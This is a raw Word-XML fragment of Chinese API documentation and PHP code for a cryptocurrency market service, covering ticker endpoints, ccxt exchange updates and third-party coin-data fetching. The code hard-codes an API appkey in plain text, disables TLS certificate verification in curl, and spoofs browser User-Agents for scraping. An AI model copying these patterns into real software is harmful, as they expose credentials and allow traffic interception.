    </w:p>
    <w:p w14:paraId="17113D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json(array_values(array_filter(array_column($kind, 'kind'))));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5FA7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AEE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D97C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/api/market/symbol_ticker </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取指定交易对实时行情列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468FB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获取指定交易对实时行情列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1210A9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243EA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286B2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@apiUse MyPages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548919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quote     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>报价货币，必填，建议使用</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>USDT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA669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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，选填</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1CCD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kind      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币分类，可选</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650CC9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{Object} data </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>实时行情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36988D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data.currency </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156625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data.fullname </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币全称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB95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data.icon </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>icon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C811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data.fullname_zh </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币中文全称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505294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data.describe </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>简介</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0FAC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data.introduction_zh </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中文简介</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734A7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data.release_time </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发布时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6DEE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data.release_price </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发布价格</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36504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data.white_paper </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>白皮书</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC397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data.block_url </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>区块链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D94C2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data.official_website </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>官网</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEB39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data.circulation </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>流通量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F7B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data.total_circulation </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发行量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392FE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data.follow_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>加入自选数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E89E4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data.kind </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0CF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data.exchange </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易所</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA044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data.symbol      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易对</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7397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data.update_time </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时间日期，格式毫秒时间戳</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5395D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data.last_price  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最新价格</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A5FA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data.open  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>开盘价</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18908C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data.high  24</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>小时最高</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7A8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data.low  24</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>小时最低</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0415CD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data.close  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>收盘价</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536B40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data.change      24</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>小时价格变动</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A111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data.percentage  24</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>小时价格变动百分比</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422FC5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data.base_volume 24</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>小时内基准货币交易量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAE4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data.quote_volume 24</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>小时内报价货币交易量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622B5D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BC40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symbol_ticker()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FC7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ABC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input('param.exchange');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAF74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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521BA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$quote = input('param.quote');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B02FB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$kind = input('param.kind');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C759A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$coins_where=array();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C2B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if($kind)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48082B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$coins_where['kind']=$kind;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C699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$coins = Db::name('coin')-&gt;where($coins_where)-&gt;order('market_value desc')-&gt;paginate($pages)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9537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if(!$coins['data'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497B54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t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>未找到虚拟币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6ECD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 = array_column($coins['data'], 'currency');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C5B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$symbol_merge = function ($base) use ($quote) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312A77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"$base/$quote";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4532F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F8F4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 = array_map($symbol_merge, $arr);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD7B7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$pre_query=Db::name('ticker')-&gt;field('batch_no')-&gt;order('ticker_timestamp desc')-&gt;limit(1)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAA80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#$ticker_where['exchange'] = $id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FF8A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$ticker_where['symbol'] = ['in', $symbol];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6C77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$ticker_where['batch_no'] = $pre_query['batch_no'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B293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$tickers=Db::name('ticker')-&gt;order('ticker_timestamp desc')-&gt;where($ticker_where)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4798B1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$attach_icon=function($coin){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EB8F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$coin['icon']= config()['appConfig']['prod_url'].'/public/coin/icon/' . strtolower($coin['currency']) . '@2x.png';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EA07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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573E62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47D9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$coins['data']=array_map($attach_icon, $coins['data']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52708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$attach_ticker=function($coin) use ($tickers, $quote) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EBAB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$symbol=$coin['currency'] . '/' .$quote;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1F91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$ticker=array_search($symbol, array_column($tickers, 'symbol'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5229A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if(false===$ticker)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241871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 + ['symbol'=&gt;$symbol, 'last_price'=&gt;0, 'change'=&gt;0, 'percentage'=&gt;0, 'base_volume'=&gt;0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D328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7C2E5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 + $tickers[$ticker]; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADAA6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362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$coins['data']=array_map($attach_ticker, $coins['data']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56251C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json($coins);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BA7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BB31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update_base()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6F10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CF27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$id=input('post.exchange')?:'binance,huobi,bitfinex,coinbase,kraken,bithumb,bitstamp,ftx,bitflyer';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15354C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$exchange_arr=array_filter(explode(',',$id));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CDD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$symbol_base=function($symbol) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4694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 = explode('/', $symbol);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBC58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$arr[0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA5C4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805F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$save_exchange=function($exchange){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D44D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$db=db('platform')-&gt;where('exchange', $exchange)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A89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3463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db('platform')-&gt;insert(['name'=&gt;$exchange, 'exchange'=&gt;$exchange, 'kind'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易所</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77969E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68477A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3F2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$update_exchange_timeframes=function($exchange){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263836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$db=Db::name('platform')-&gt;where('exchange', $exchange-&gt;id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55805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71D5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$db['timeframes']=implode(',', array_keys($exchange-&gt;timeframes));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4B91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$db['symbol_num']=count($exchange-&gt;symbols);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2B9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Db::name('platform')-&gt;where('exchange', $exchange-&gt;id)-&gt;update($db);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761ED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02BF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3C6D94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EC2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array_map($save_exchange, $exchange_arr);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F755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($exchange_arr as $ex)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539D42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18A4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$ex;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736F00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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047FC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$markets = $exchange-&gt;load_markets();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CBFA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$currencies=array_unique(array_map($symbol_base, $exchange-&gt;symbols));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D667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$update_exchange_timeframes($exchange);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1033B2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($currencies as $currency){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A593E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$where['currency']=$currency;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBAF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$db=Db::name('coin')-&gt;where($where)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEE06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86A32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$db['exchange']=implode(',',array_unique(array_filter(explode(',',$db['exchange'].','.$ex))));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D11F1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Db::name('coin')-&gt;where($where)-&gt;update($db);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247B1E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24A92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$db['currency']=$currency;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D05E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$db['exchange']=$ex;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BA8D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Db::name('coin')-&gt;insert($db);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD6A3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3D41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16A3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997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Db::name('coin')-&gt;where('currency', 'btc')-&gt;update(['kind'=&gt;'DEFI']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22961E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Db::name('coin')-&gt;where('currency', 'dfa')-&gt;update(['kind'=&gt;'DEFI']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741796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Db::name('coin')-&gt;where('currency', 'eth')-&gt;update(['kind'=&gt;'NEF']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FC29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Db::name('coin')-&gt;where('currency', 'dat')-&gt;update(['kind'=&gt;'NEF']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDED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exit('Done');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127736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625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update_ticker()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114A5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9812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validate('Market');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441660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296F8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3670A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6BE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input('post.exchange');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390A71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$exchange_id = '\\ccxt\\' . $id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BC0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 = new $exchange_id (array (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28399A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'enableRateLimit' =&gt; true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EC92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C138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($exchange-&gt;has['fetchTickers']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B09B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$tickers = ($exchange-&gt;fetch_tickers ());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5742F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3E5A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if(!$tickers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792B8C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exit('None');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B813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$where['exchange'] = $id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDBD1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$data['update_time'] = (int)(microtime(true)*1000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F465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$data['batch_no'] = md5(uniqid(mt_rand(), true));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F7AA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($tickers as $ticker)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53431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42B0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$data['exchange'] = $id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8C8A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$data['symbol'] = $ticker['symbol'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46978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$data['ticker_timestamp'] = $ticker['timestamp'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0E09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$data['base_volume'] = $ticker['baseVolume'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B903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$data['quote_volume'] = $ticker['quoteVolume'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2790B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$data['last_price'] = $ticker['last'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759FCA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$data['open'] = $ticker['open'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E367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$data['high'] = $ticker['high'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD7ED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$data['low'] = $ticker['low'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D1D2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$data['close'] = $ticker['close'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9034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$data['change'] = $ticker['change'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003F9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$data['percentage'] = $ticker['percentage'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2356E0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$where['symbol'] = $ticker['symbol'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EAE3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$ret=Db::name('ticker')-&gt;insert($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C219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CDA9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Hook::listen('action_log', $data['batch_no']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF11D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exit('Done');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79015C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5975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update_coin_from_6pai() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3700B1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set_time_limit(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B82C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'---Update Start---&lt;br&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249391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Db::table('fx_coin')-&gt;chunk(100, function($coins) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C36EE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$liuapi=function($currency) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726A9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$url='http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E068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$params=array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B23A4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'appkey' =&gt; 'cad54e35284e0633a37411a8fd46a1cb',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0175D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'currency' =&gt; $currency,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2065A9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'unit' =&gt; 'USDT'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773601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D469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$httph =curl_init($url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D653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CURLOPT_SSL_VERIFYPEER, FALSE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2144B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CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F249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CURLOPT_POST, 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F417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CURLOPT_POSTFIELDS, $params);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F25FB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CURLOPT_RETURNTRANSFER,TRUE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2F8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CURLOPT_HEADER,FALSE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC619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$rst=curl_exec($httph);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D1CF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curl_close($httph);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A008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$data=json_decode($rst);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C0B3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48B85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6BC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($coins as $coin) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397198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$apidata=$liuapi($coin['currency']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E2C2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if(200==$apidata-&gt;status){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775CCB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$result=$apidata-&gt;result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEF1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$coin['fullname']=$result-&gt;summary-&gt;fullname;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BA6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$coin['fullname_zh']=$result-&gt;summary-&gt;fullname_zh;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4122E0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$coin['describe']=$result-&gt;summary-&gt;introduction_zh;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721A6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$coin['introduction_zh']=$result-&gt;summary-&gt;introduction_zh;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CE43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$coin['white_paper']=$result-&gt;summary-&gt;whitepaper;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F51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$coin['circulation']=$result-&gt;summary-&gt;circulation;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E43CE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$coin['market_value']=$result-&gt;summary-&gt;circulation_value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A61D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$coin['block_url']=$result-&gt;summary-&gt;blockchain_site;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D1D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$coin['official_website']=$result-&gt;summary-&gt;website;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7F18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$coin['total_circulation']=$result-&gt;summary-&gt;total_circulation;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E4CE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Db::name('coin')-&gt;where('currency',$coin['currency'])-&gt;update($coin);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C63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 ' . $coin['currency'] . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>更新完成</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>---&lt;br&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CA11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1D9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7A61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F4C5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'---Update End---&lt;br&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C37A4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exit('Exit');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBC8D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97B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update_platform_from_feixiaohao(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783F4B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$headers['User-Agent']='Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F43DC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$maxpage=100;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597617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$page=1;</w:t>
